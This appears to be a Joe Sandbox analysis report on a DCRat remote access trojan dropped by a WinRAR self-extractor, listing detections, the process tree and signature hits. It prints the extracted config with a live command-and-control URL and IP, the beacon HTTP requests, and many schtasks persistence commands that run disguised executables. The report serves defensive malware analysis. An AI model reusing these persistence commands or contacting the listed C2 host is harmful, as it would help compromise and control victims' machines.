Edit tour

Windows Analysis Report
CPYEzG7VGh.exe

Overview

General Information

Sample name:	CPYEzG7VGh.exe renamed because original name is a hash value
Original sample name:	F7361ED3503F11A56E8CC53AD6C277B8.exe
Analysis ID:	1545622
MD5:	f7361ed3503f11a56e8cc53ad6c277b8
SHA1:	bfa62d30d715bf866d5a2a6198a474c316b3dc04
SHA256:	a64e0fad64514c66bc6750432d8c3ef96932f9902886f540cca217031d1cfc44
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

CPYEzG7VGh.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\CPYEzG7VGh.exe" MD5: F7361ED3503F11A56E8CC53AD6C277B8)

wscript.exe (PID: 1240 cmdline: "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Agentserver.exe (PID: 3356 cmdline: "C:\surrogateserverreviewsession\Agentserver.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

schtasks.exe (PID: 5968 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6648 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6524 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4324 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2380 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3840 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6572 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6200 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4308 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 8 /tr "'C:\Recovery\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4832 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 8 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6976 cmdline: schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 768 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\surrogateserverreviewsession\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3176 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4724 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2472 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6004 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3752 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5744 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 6 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 320 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6804 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4816 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1576 cmdline: schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1292 cmdline: schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 2072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 1240 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

dasHost.exe (PID: 3228 cmdline: "C:\surrogateserverreviewsession\dasHost.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

dasHost.exe (PID: 5740 cmdline: C:\surrogateserverreviewsession\dasHost.exe MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

dasHost.exe (PID: 6448 cmdline: C:\surrogateserverreviewsession\dasHost.exe MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

Memory Compression.exe (PID: 1200 cmdline: "C:\Program Files\7-Zip\Lang\Memory Compression.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

Memory Compression.exe (PID: 5968 cmdline: "C:\Program Files\7-Zip\Lang\Memory Compression.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

uXGucUKOPdf.exe (PID: 6388 cmdline: "C:\Program Files\Windows NT\uXGucUKOPdf.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

uXGucUKOPdf.exe (PID: 6524 cmdline: "C:\Program Files\Windows NT\uXGucUKOPdf.exe" MD5: F1AAAC4C20DF683E3596C8A7CD3DA07E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"O\":\" \",\"d\":\"#\",\"M\":\"_\",\"l\":\"<\",\"Z\":\"|\",\"i\":\"$\",\"a\":\";\",\"V\":\"(\",\"h\":\".\",\"6\":\")\",\"1\":\"-\",\"0\":\"`\",\"S\":\",\",\"T\":\"%\",\"D\":\"^\",\"I\":\"*\",\"y\":\"~\",\"m\":\"@\",\"Q\":\">\",\"9\":\"!\",\"5\":\"&\"}", "PCRT": "{\"6\":\"-\",\"i\":\"~\",\"I\":\"<\",\"S\":\"^\",\"X\":\",\",\"0\":\")\",\"x\":\"@\",\"=\":\"!\",\"j\":\".\",\"M\":\"%\",\"c\":\" \",\"Q\":\"|\",\"e\":\"$\",\"w\":\"`\",\"l\":\"#\",\"f\":\">\",\"D\":\"_\",\"y\":\";\",\"p\":\"*\",\"b\":\"&\"}", "TAG": "", "MUTEX": "DCR_MUTEX-hhiTpMigK3gVTrSKkwhY", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy08450.tw1.ru/@=YWYmRWNjhTO", "H2": "http://cy08450.tw1.ru/@=YWYmRWNjhTO", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000027.00000002.2256049771.000000000283B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.2219542033.0000000002D18000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.2216128308.00000000032A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.2220090209.0000000003028000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.2219542033.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2219627479.0000000002F08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2122617723.0000000002A94000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000024.00000002.2240602993.0000000002631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2219627479.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2122617723.0000000002A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.2256049771.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2217002951.0000000002C58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2217002951.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.2220090209.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2122617723.0000000002791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.2216128308.0000000003251000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Agentserver.exe PID: 3356	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 5740	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 6448	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Memory Compression.exe PID: 1200	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Memory Compression.exe PID: 5968	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: uXGucUKOPdf.exe PID: 6388	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: uXGucUKOPdf.exe PID: 6524	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dasHost.exe PID: 3228	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\surrogateserverreviewsession\Agentserver.exe, ProcessId: 3356, TargetFilename: C:\surrogateserverreviewsession\dasHost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\surrogateserverreviewsession\dasHost.exe, CommandLine: C:\surrogateserverreviewsession\dasHost.exe, CommandLine|base64offset|contains: , Image: C:\surrogateserverreviewsession\dasHost.exe, NewProcessName: C:\surrogateserverreviewsession\dasHost.exe, OriginalFileName: C:\surrogateserverreviewsession\dasHost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\surrogateserverreviewsession\dasHost.exe, ProcessId: 5740, ProcessName: dasHost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\CPYEzG7VGh.exe", ParentImage: C:\Users\user\Desktop\CPYEzG7VGh.exe, ParentProcessId: 4952, ParentProcessName: CPYEzG7VGh.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe" , ProcessId: 1240, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T18:27:10.989232+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49704	185.114.245.123	80	TCP
2024-10-30T18:27:13.801986+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49710	185.114.245.123	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CPYEzG7VGh.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\surrogateserverreviewsession\Agentserver.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\surrogateserverreviewsession\dasHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000022.00000002.2219627479.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"O\":\" \",\"d\":\"#\",\"M\":\"_\",\"l\":\"<\",\"Z\":\"|\",\"i\":\"$\",\"a\":\";\",\"V\":\"(\",\"h\":\".\",\"6\":\")\",\"1\":\"-\",\"0\":\"`\",\"S\":\",\",\"T\":\"%\",\"D\":\"^\",\"I\":\"*\",\"y\":\"~\",\"m\":\"@\",\"Q\":\">\",\"9\":\"!\",\"5\":\"&\"}", "PCRT": "{\"6\":\"-\",\"i\":\"~\",\"I\":\"<\",\"S\":\"^\",\"X\":\",\",\"0\":\")\",\"x\":\"@\",\"=\":\"!\",\"j\":\".\",\"M\":\"%\",\"c\":\" \",\"Q\":\"|\",\"e\":\"$\",\"w\":\"`\",\"l\":\"#\",\"f\":\">\",\"D\":\"_\",\"y\":\";\",\"p\":\"*\",\"b\":\"&\"}", "TAG": "", "MUTEX": "DCR_MUTEX-hhiTpMigK3gVTrSKkwhY", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy08450.tw1.ru/@=YWYmRWNjhTO", "H2": "http://cy08450.tw1.ru/@=YWYmRWNjhTO", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Containers\serviced\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Offline Web Pages\uXGucUKOPdf.exe	ReversingLabs: Detection: 83%
Source: C:\surrogateserverreviewsession\Agentserver.exe	ReversingLabs: Detection: 83%
Source: C:\surrogateserverreviewsession\dasHost.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: CPYEzG7VGh.exe

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\surrogateserverreviewsession\Agentserver.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected
Source: C:\surrogateserverreviewsession\dasHost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CPYEzG7VGh.exe

Joe Sandbox ML: detected

Source: CPYEzG7VGh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\d5489f5e5451db	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\7-Zip\Lang\1a5d5b8dcee3d8	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Directory created: C:\Program Files\Windows NT\d5489f5e5451db	Jump to behavior

Source: unknown

HTTPS traffic detected: 185.114.245.123:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: CPYEzG7VGh.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: CPYEzG7VGh.exe

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0037A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0037A5F4
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0038B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0038B8E0
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Code function: 0_2_0039AAA8 FindFirstFileExA,	0_2_0039AAA8

Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49710 -> 185.114.245.123:80
Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 185.114.245.123:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://cy08450.tw1.ru/@=YWYmRWNjhTO

Source: Joe Sandbox View

ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: vh438.timeweb.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /parking/?ref=cy08450.tw1.ru&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn&3e48e0b3851c0a441c70744047c3bbd6=2dfc2c4d65174f7765d320b12c48ed88&a552bb1baa0205e417bc3d750c585e5e=QZ3EzN1QWYlVDOzMTYxUTNkNzMjRzYxYjNzYTM5cTNiZWNxEWOmVmY&6KrZzmJwk86p7OrsOlV5no6Kl=5pmNLP5bbforFzU&FsHKNcwZ0eU4ISOgyXreJWxqtgwMEh=glqiOCaOd2NXq5ASJ&H3rHzwt5aa=pkVT8xTbt9eXJOl69GvsNn HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: vh438.timeweb.ru
